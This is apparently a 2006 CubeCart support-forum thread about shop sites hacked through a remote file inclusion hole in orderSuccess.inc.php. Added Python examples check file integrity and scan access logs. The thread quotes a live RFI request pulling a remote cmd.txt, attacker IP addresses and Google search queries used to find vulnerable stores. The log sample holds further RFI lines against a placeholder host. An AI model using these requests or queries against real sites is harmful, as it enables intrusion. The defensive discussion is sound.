Guest woodbtreasures, posted January 2, 2006: How the hell do I fix this now? http://www.wood-b-treasures.com/ This is just f*cking wonderful. From my server logs I found 3 sites trying to access via //includes/ordersuccess... at 17 different times. Apparently one was successful. Blacklist these IPs on your server... though I doubt that it will do any good. 153.5.37.202 62.141.50.117 82.59.68.239
Guest woodbtreasures, posted January 2, 2006: http://wood-b-treasures.com//includes/orde...order_id=1&glob[rootDir]=http://www.illusor.altervista.org/cmd.txt?

_START_ 1,"login" => 1,"logout" => 1,"forgotPass" => 1,"account" => 1,"profile" => 1,"changePass" => 1,"newsletter" => 1,"cart" => 1,"step1" => 1,"step2" => 1,"step3" => 1,"step4" => 1,"step5" => 1,"reg" => 1,"viewOrders" => 1,"viewOrder" => 1,"confirmed" => 1); ?> _END_

Fatal error: Cannot instantiate non-existent class: htmlmimemail in /home/wooddbd/public_html/includes/orderSuccess.inc.php on line 40

This is an example of one of the 17 different instances that I find in my server logs.
Guest woodbtreasures, posted January 2, 2006: Oh, and BTW... I'm talking to myself right now, but I had applied brooky's fix that was sent out via email, but had not yet updated to 3.0.7 or anything else yet. I had figured that was good enough.
Guest dorianrave, posted January 2, 2006: My website was hacked too. Lost all my files. Thank god for backups.
Guest woodbtreasures, posted January 2, 2006: Didn't lose any files, but this is still ridiculous. This needs to be fixed! OK, I was looking through my server files and everything is there, and there is no alternate index page, so I have no idea how the hell they are doing this. Some sort of cross-site scripting perhaps? God, I'm screwed, someone please help!
Guest radicalwheels, posted January 2, 2006: Hacked here too, but they didn't do anything except get into admin and reset passwords, etc... Look at your index.php file.
Guest Marshalls, posted January 2, 2006: How are they doing it? Why, all of a sudden, is this crap going on now?
Guest estelle, posted January 2, 2006: Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched.
Guest radicalwheels, posted January 2, 2006: (quoting estelle) "Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched." I did, but had to change it since I had customers checking out, getting errors and entering credit cards 2 and 3 times, which led to almost 3k in duplicate charges. I used Sir William's fix at first. Now (since he updated) the orderSuccess.inc.php is working again. So patched again...
Guest gwizard, posted January 2, 2006: LOL, you were owned by script kiddies. Please ensure that your PHP version is NO LESS than 4.1.0. If your host is cloaked as Linux and you are in fact running Windows, then please ensure that your host admin applied all the necessary patches. Also, if I were the host, I would apply IDS protection at the router level that would deny frequent incoming connections from the same IPs. This looks less like a CC issue than a host issue.
Guest woodbtreasures, posted January 2, 2006: Hmm... well, I'm glad that YOU find this amusing.
Guest aikdo, posted January 2, 2006: Yo bro, your site is fixed. I took the liberty of uploading the new index.php file for you... I'll go through and make sure there are no ping-markers in any of the other files...
Guest aikdo, posted January 2, 2006 (edited): EVERYONE THAT HAS BEEN HACKED: CHECK YOUR INCLUDES FOLDER. IF YOU FIND ANY FILES OUT OF PLACE, DELETE THEM ASAP... YOUR SERVERS WILL BE USED FOR THE NEXT ATTACK IF YOU DO NOT... DELETE NOW... PS. Wood-b-treasure, you had 3: aha.php (contained a trojan), db.pl (could alter ANY of your database info), [email protected] (would be used on other servers alike), and finally another folder was also in the includes called .tmp, which again contained 2 other .pl scripts... I have removed these and am looking for more... BUT EVERYONE SHOULD CHECK THEIR SERVERS NOW!!!! Edited January 2, 2006 by aikdo
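The post above asks everyone to look through includes/ for files that do not belong. Eyeballing a directory misses dropped files with innocent names (aha.php looks like a stock PHP file) and misses shipped files that were tampered with in place. The following is an added example, not code from the thread or from CubeCart, showing the check a defender would actually run: hash every file under includes/ (hidden directories such as .tmp included) against a manifest taken from a known-good install, then report added, removed and modified paths. The assumptions are that a stock includes/ tree contains only PHP source, so Perl, shell or text files are out of place, and the sample tree built in demo() is constructed for the example.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumption for the example: a stock CubeCart includes/ tree holds only .php /
# .inc.php sources, so these suffixes have no business being there.
UNEXPECTED_SUFFIXES = {".pl", ".sh", ".py", ".cgi", ".txt"}


def build_manifest(root):
    """Map every file under root to its SHA-256. pathlib's rglob does not skip
    dotfiles, so a hidden .tmp/ directory is included in the walk."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            manifest[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline, current):
    """Compare a trusted baseline manifest against the live tree."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def flag_unexpected(paths):
    """Subset of paths whose location (hidden directory) or suffix is out of place.
    This is only a name heuristic; the manifest diff is the authoritative signal."""
    flagged = []
    for p in paths:
        parts = Path(p).parts
        hidden_dir = any(part.startswith(".") for part in parts[:-1])
        if hidden_dir or Path(p).suffix.lower() in UNEXPECTED_SUFFIXES:
            flagged.append(p)
    return flagged


def demo():
    """Constructed scenario: a clean includes/ tree, then the kind of files the
    post above reports (aha.php, db.pl, a hidden .tmp/ with Perl scripts) plus
    one shipped file altered in place."""
    with tempfile.TemporaryDirectory() as tmp:
        inc = Path(tmp) / "includes"
        inc.mkdir()
        (inc / "orderSuccess.inc.php").write_text("<?php // original ?>")
        (inc / "functions.inc.php").write_text("<?php // helpers ?>")
        baseline = build_manifest(inc)  # would normally be saved from a known-good install

        # Later: files dropped into the tree and a shipped file tampered with
        (inc / "aha.php").write_text("<?php // dropped file ?>")
        (inc / "db.pl").write_text("#!/usr/bin/perl\n")
        (inc / ".tmp").mkdir()
        (inc / ".tmp" / "x.pl").write_text("#!/usr/bin/perl\n")
        (inc / "orderSuccess.inc.php").write_text("<?php // tampered ?>")

        changes = diff_manifest(baseline, build_manifest(inc))
        return changes, flag_unexpected(changes["added"])


if __name__ == "__main__":
    changes, flagged = demo()
    for kind in ("added", "removed", "modified"):
        print(f"{kind}: {changes[kind]}")
    print(f"flagged by name: {flagged}")
```

Note what the name heuristic does and does not catch in the demo: db.pl and .tmp/x.pl are flagged, but aha.php is not, and the tampered orderSuccess.inc.php only shows up because its hash changed. Keep the baseline manifest somewhere the web server cannot write to, and regenerate it whenever you apply an official patch.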
Guest aikdo, posted January 2, 2006: One more note to Wood-be-treasure: looking at OrderSuccess, I found that it has not been patched with brooky's or Sir William's... That is where your vulnerability has now shown up...
Guest vrakas, posted January 2, 2006: Q: From where do they find our sites? :)
Guest timecrisis, posted January 2, 2006: From links in your profile? I would urge all to remove links to your sites from the forum. It is bad practice (in my book) to post links on dev forums like this one!
Guest estelle, posted January 2, 2006 (edited): And they can find them through Google, at least all stores where the licence fee hasn't been paid. Yet another reason why everyone should buy a licence! Edited January 2, 2006 by estelle
Guest woodbtreasures, posted January 2, 2006: (quoting vrakas) "Q: From where do they find our sites?" Thank you, Aikdo. Well, I thought that I had successfully patched, but all that I had done was to install that image upload patch that had been sent out via email. So I guess it was my fault. As to how they found the site... according to my server access logs they came in from doing a search for "Powered by Cubecart 3.0.6"...
Guest radicalwheels, posted January 2, 2006: They did a search from Google for "Powered by Cubecart 3.0.4" and came in that way for me. Licensed now...
Guest deebee, posted January 2, 2006: (quoting vrakas) "Q: From where do they find our sites?" Easy. The biggest search term on my stats today has been "powered by cubecart 3.0.6", followed by "powered by cubecart", followed by "cubecart 3.0.6".
Guest aikdo, posted January 2, 2006: Same here (http://www.cubecart.com/site/forums/index.php?):

allintext:powered by cubecart 3.0.
intext:"Powered by CubeCart 3.0.6"
intitle:"Powered by CubeCart"
powered by cubecart 3.0.6
"Powered by CubeCart" 3.0.6 .edu
"powered by CubeCart 3.0.6"
intext:powered by CubeCart 3.0.6
Powered by Cubecart

Each was used about 10 times. Luckily my sites are protected...
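Two signals run through this thread that a store owner can pull straight out of the web server's access log: the request shown in the second post, where glob[rootDir] is pointed at a remote URL so that orderSuccess.inc.php includes attacker-hosted code, and the search-engine referrers in the posts just above, where visitors arrive from a query for the "Powered by CubeCart" footer string. The following is an added example, not code from the thread or from CubeCart, that parses Apache combined-format log lines, classifies each hit as a known remote-file-inclusion attempt (glob[rootDir] carrying a remote URL), a lower-confidence remote-URL parameter, or a fingerprint-search referrer, and tallies them per source IP. The log lines in LOG_SAMPLE are constructed for the example (attacker.example, partner.example and the documentation IP ranges are placeholders); the treatment of an RFI request that returned HTTP 200 as a probable successful include is a heuristic, as the first post's own example shows the remote file's output and a PHP fatal error on what was otherwise a normal page.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format (assumption: adjust LOG_RE if your host logs differently).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# The parameter abused in the thread, and the schemes that turn an include()
# of it into a fetch of attacker-hosted code.
KNOWN_RFI_PARAMS = {"glob[rootDir]"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Footer string the thread reports as the search term used to locate stores.
FINGERPRINT = "powered by cubecart"

# Constructed sample log; hosts and addresses are placeholders.
LOG_SAMPLE = """\
198.51.100.7 - - [02/Jan/2006:10:14:03 +0000] "GET /includes/orderSuccess.inc.php?order_id=1&glob[rootDir]=http://attacker.example/cmd.txt? HTTP/1.1" 200 1843 "-" "Mozilla/4.0"
198.51.100.7 - - [02/Jan/2006:10:14:09 +0000] "GET /includes/orderSuccess.inc.php?order_id=1&glob%5BrootDir%5D=http%3A%2F%2Fattacker.example%2Fcmd.txt%3F HTTP/1.1" 500 612 "-" "Mozilla/4.0"
203.0.113.21 - - [02/Jan/2006:11:02:44 +0000] "GET /index.php?act=viewCat&catId=3 HTTP/1.1" 200 9321 "http://www.google.com/search?q=intext%3A%22Powered+by+CubeCart+3.0.6%22" "Mozilla/5.0"
203.0.113.21 - - [02/Jan/2006:11:02:51 +0000] "GET /includes/orderSuccess.inc.php?order_id=1&glob[rootDir]=ftp://attacker.example/c.txt HTTP/1.1" 404 301 "-" "Mozilla/5.0"
192.0.2.55 - - [02/Jan/2006:12:30:00 +0000] "GET /index.php?act=cart&ref=http://partner.example/ HTTP/1.1" 200 7712 "-" "Mozilla/5.0"
"""


def parse_log_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(path):
    """(name, value) pairs in the query string whose value is a remote URL.
    parse_qs percent-decodes both names and values, so glob%5BrootDir%5D is
    seen as glob[rootDir]."""
    hits = []
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        for v in values:
            if v.lower().startswith(REMOTE_SCHEMES):
                hits.append((name, v))
    return hits


def classify(rec):
    """'rfi' for a known include-override parameter carrying a remote URL,
    'remote-url' for any other parameter carrying one, 'dork-referer' for a
    search-engine visit on the footer string, otherwise None."""
    hits = remote_url_params(rec["path"])
    if any(name in KNOWN_RFI_PARAMS for name, _ in hits):
        return "rfi"
    if hits:
        return "remote-url"
    query = parse_qs(urlsplit(rec["referer"]).query).get("q", [""])[0]
    if FINGERPRINT in query.lower():
        return "dork-referer"
    return None


def scan_log(lines):
    """Per-IP counts of each event kind, plus the RFI requests that returned 200
    (heuristically, the ones where the include probably went through)."""
    by_ip = {}
    succeeded = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        by_ip.setdefault(rec["ip"], Counter())[kind] += 1
        if kind == "rfi" and rec["status"] == "200":
            succeeded.append((rec["ip"], rec["time"], rec["path"]))
    return by_ip, succeeded


if __name__ == "__main__":
    by_ip, succeeded = scan_log(LOG_SAMPLE.splitlines())
    for ip, counts in by_ip.items():
        print(ip, dict(counts))
    for ip, when, path in succeeded:
        print(f"probable successful include from {ip} at {when}: {path}")
```

On the sample, 198.51.100.7 makes two RFI attempts (one raw, one percent-encoded) of which the first returned 200; 203.0.113.21 arrives via a fingerprint search and then attempts an RFI that 404s; 192.0.2.55 only carries an ordinary URL-valued parameter, which is listed separately so that legitimate redirect or affiliate parameters do not get mistaken for attacks. Run it against the real log with `scan_log(open("access.log").read().splitlines())`; a hit in the 'rfi' class against a file that has not been patched is the cue to treat the host as compromised and go through includes/ as the thread describes.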
Guest estelle, posted January 2, 2006: (quoting gwizard) "This looks as less CC issue as host issue." I guess you spoke before you read all the discussions about the security hole in CC?
Guest woodbtreasures, posted January 2, 2006: He he. Search results are still showing my skins site http://www.webdesignbyjeremy.com as 3.0.6, and they tried the order success includes again... this time unsuccessfully. I've done a fresh install of 3.0.7pl-1 and they can all kiss my a$$ :P
Al Brookbanks, posted January 3, 2006: I'm pleased the patch definitely works, but as Sir Will says it is a barrier and not an absolute fix. There is a possibility they could find a way to break the barrier. I'm focused on making it even stronger and looking deeply into other possible vulnerabilities. Apologies for your inconvenience and the stress associated with this malicious attack. I can only strive to try and prevent anything like this from happening again.
Guest timecrisis, posted January 3, 2006 (edited): Yes, I would advise people to: 1: Get a licence. 2: Don't post your site URLs on here. This is the first place black hats and script kiddies would look, and they can read just as well as you can... well, the script kiddies maybe not =) Good idea on the job advert, Brooky... Thanks for the updates. Edited January 3, 2006 by timecrisis